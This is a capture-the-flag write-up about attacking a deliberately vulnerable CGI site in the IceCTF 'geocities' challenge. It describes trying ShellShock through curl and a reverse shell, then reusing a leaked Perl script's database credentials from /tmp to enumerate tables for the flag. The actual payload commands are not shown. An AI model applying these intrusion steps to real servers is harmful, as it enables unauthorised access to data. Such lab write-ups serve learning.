I recently stumbled onto this old geocities site (http://geocities.vuln.icec.tf/), it’s a miracle that it’s still up! It must be running some ancient technology and probably hasn’t been updated in years, it’s our lucky day boys!
After analyzing the website I didn’t found nothing until I started reading the messages where there was some hints, the blog posts were speaking about some websites made in perl and bash, and I started thinking there maybe were some CGI scripts on the website. I tryed to find any particular file in the cgi-bin folder but nothing. Until I did the most obvivious which was trying to access this “http://geocities.vuln.icec.tf/index.cgi" and it existed! Now lets try some ShellShock with Curl:
my $dbh = DBI->connect( "dbi:mysql:dbname=geocities;host=icectf_mariadb", "geocities", "geocities", { RaiseError => 1 }, ) or die $DBI::errstr;
my $sth = $dbh->prepare("SELECT * from Posts ORDER BY post_date DESC"); $sth->execute();
my $row; while ($row = $sth->fetchrow_arrayref()) { print"@$row[1];@$row[2];@$row[3]\n"; }
$sth->finish(); $dbh->disconnect();
Oh a perl script that connects to a sql databases maybe our flag is somewhere in that database! but first we need to access it! After this I tried a reverse shell but It wasn’t working so I just tried to access mysql with the command since we already had the credentials from the source above, but failed to execute even trying the most common locations of mysql (maybe the admins deactivated this for security reasons for the current user running the website) then I thought of replicate the perl script above and send it to /tmp folder and execute it.
The first thing I had to do was to know what is the name of the other sql tables this could be easy with a select to the informationschema tables:
So we have two database tables one named posts and the other named 47a6fd2ca39d2b0d6eea1c30008dd889, now we only need to select everything from this one and see if the flag is in it:
